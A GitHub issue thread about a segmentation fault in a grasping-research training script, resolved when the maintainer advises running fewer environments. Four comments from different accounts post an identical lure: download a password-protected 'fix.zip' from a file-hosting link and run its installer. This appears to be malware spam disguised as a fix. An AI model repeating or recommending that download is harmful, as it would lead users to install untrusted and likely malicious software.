### ISSUE TITLE
JointSpec type free not yet supported! Segmentation fault (core dumped)

### ISSUE THREAD

**Issue by liuqi8827** [tianhaowuhz/human-assisting-dex-grasp#2]
Hi, 

1. I followed the readme.

2. However, when I run `sh ./gf_train.sh`, it shows:
![image](https://github.com/user-attachments/assets/60c787cf-58d2-4c78-bbfd-e328a9ac0308)

3. Can you give me some suggestions? 
4. **Maybe the cause of the problem is `JointSpec type free not yet supported!`**
![image](https://github.com/user-attachments/assets/981ece99-1152-4ae4-a709-90d6f994b3bc)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tianhaowuhz** [comment]
We actually do not use XML files. This problem may caused by creating too many environments, and the computer does not have enough memory, you can try to run the shell with fewer environment numbers, such as 10.

**Comment by liuqi8827** [comment]
@tianhaowuhz 
Yes. It works. Thanks for your quick reply.

**Comment by tianhaowuhz** [comment]
no problem
